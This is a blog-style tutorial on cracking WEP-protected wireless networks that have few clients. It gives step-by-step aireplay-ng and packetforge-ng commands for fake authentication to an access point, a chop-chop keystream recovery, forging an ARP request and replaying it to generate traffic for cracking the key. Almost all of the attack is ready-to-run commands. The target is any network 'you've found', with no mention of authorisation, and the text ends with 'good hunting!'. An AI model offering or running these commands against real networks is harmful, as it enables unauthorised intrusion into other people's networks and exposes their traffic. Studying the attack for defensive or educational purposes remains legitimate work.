Advanced WEP Packet Forgery

Let’s say you’re in a location where the WEP network you’ve found is a bit guarded with replay attacks, or are practically no clients from which to capture a target packet. How can you get around this to generate data and crack the encryption?

Note: This assumes that you already have a network interface in monitor mode. If you haven’t done that yet see the “Wireless Attack: WEP” posting for information on how to do this.

First you need to authenticate to the AP, but of course you don’t know the credentials to do so. We can use aireplay-ng to do this:

aireplay-ng -1 0 -e {ESSID}

Next we need to perform a chop-chop attack to decode a single packet. We can do this with aireplay-ng as well (MON_INT is the monitor interface):

aireplay-ng -4 -b {BSSID} -h {YOUR_MAC} {MON_INT}

Say “y” to the first packet you find, and let the decryption complete. You’ll get three files from this:

  • replay_src-MMDD-HHmmss.cap: This is the original packet.
  • replay_dec-MMDD-HHmmss.cap: This is the decrypted packet.
  • replay_dec-MMDD-HHmmss.xor: This is the decrypted keystream.

Now we’ll create a new ARP packet that we can use for the standard ARP replay attack using packetforge-ng:

packetforge-ng -0 -a {BSSID} -h {YOUR_MAC} -k {BSSID_IP} -l {ANY_IP} -y {XOR_FILE} -w arp-for-replay.cap

The output of this will be a single packet file that contains an ARP request perfect for replaying.

Now start up your capture (to crack, just like in the “Wireless Attack: WEP” posting). Odds are that you’ll need to re-fake your authentication:

aireplay-ng -1 0 -e {ESSID}

And now you can replay like normal with:

aireplay-ng -2 -r /path/to/arp-for-replay.cap {MON_INT}

That’s it… good hunting!